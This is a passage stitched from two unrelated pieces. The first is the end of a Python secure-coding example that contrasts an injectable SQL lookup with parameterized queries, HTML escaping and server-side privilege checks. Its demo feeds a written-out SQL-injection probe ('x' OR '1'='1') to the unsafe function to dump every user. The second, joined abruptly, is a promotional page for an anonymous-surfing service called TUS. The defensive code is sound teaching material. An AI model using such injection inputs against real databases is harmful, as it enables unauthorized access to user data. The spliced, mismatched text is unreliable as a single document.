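    query = "SELECT name FROM users WHERE name = ?"
    return [row[0] for row in conn.execute(query, (name,))]


def render_bio(conn: sqlite3.Connection, name: str) -> str:
    """Scrub stored content on the way out: html.escape turns a stored
    <script> tag into inert text before it reaches a browser."""
    row = conn.execute("SELECT bio FROM users WHERE name = ?", (name,)).fetchone()
    return html.escape(row[0]) if row else ""


def is_privileged(conn: sqlite3.Connection, cookies: dict) -> bool:
    """Decide privilege from the server-side session and the users table.

    Any IsAuthenticated / IsPrivileged value the client sends is ignored: the
    only cookie consulted is the session token, and the admin flag is read
    from the database row for the user that token maps to.
    """
    user = SESSIONS.get(cookies.get("session"))
    if user is None:
        return False
    row = conn.execute("SELECT is_admin FROM users WHERE name = ?", (user,)).fetchone()
    return bool(row and row[0])


if __name__ == "__main__":
    db = make_db()
    probe = "x' OR '1'='1"  # constructed hostile input
    print("unsafe:", lookup_unsafe(db, probe))   # every user
    print("safe:  ", lookup_safe(db, probe))     # no match
    print("bio:   ", render_bio(db, "bob"))      # escaped markup
    print("priv:  ", is_privileged(db, {"IsPrivileged": "1"}))  # False
```

The same contrast applies to PHP's mysqli or PDO prepared statements: what matters is that user-supplied values are passed to the driver as bound parameters rather than spliced into the query string, and that privilege is recomputed on the server for every request.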
-
TUS - The Untraceable Surfer

We provide a platform for true anonymous, safe and unrestricted web surfing. The internet is a public network where eavesdropping is made very easy. Also internet service providers, workplaces and governments may restrict and monitor internet usage. By surfing the internet on our terminal servers all these privacy concerns and restrictions are gone.

Download: https://www.tusurfer.com/tus/download.do

Dear User,

On the behalf of the TUS team I welcome you to our website. The TUS website allows and enables citizens of any country to be able to freely and safely access any information on the internet. And the reason this website was created? The idea was born while I was living in a communist country. Although later I moved to Canada (one of the best countries in the world) I have not forgotten my roots. Please enjoy our services and help us make them better by giving us your invaluable feedback. Also if you have any suggestion, concern or question we would love to hear from you.

Kindest regards,
Nigel Fox

Info: https://www.tusurfer.com/tus/index.jsp
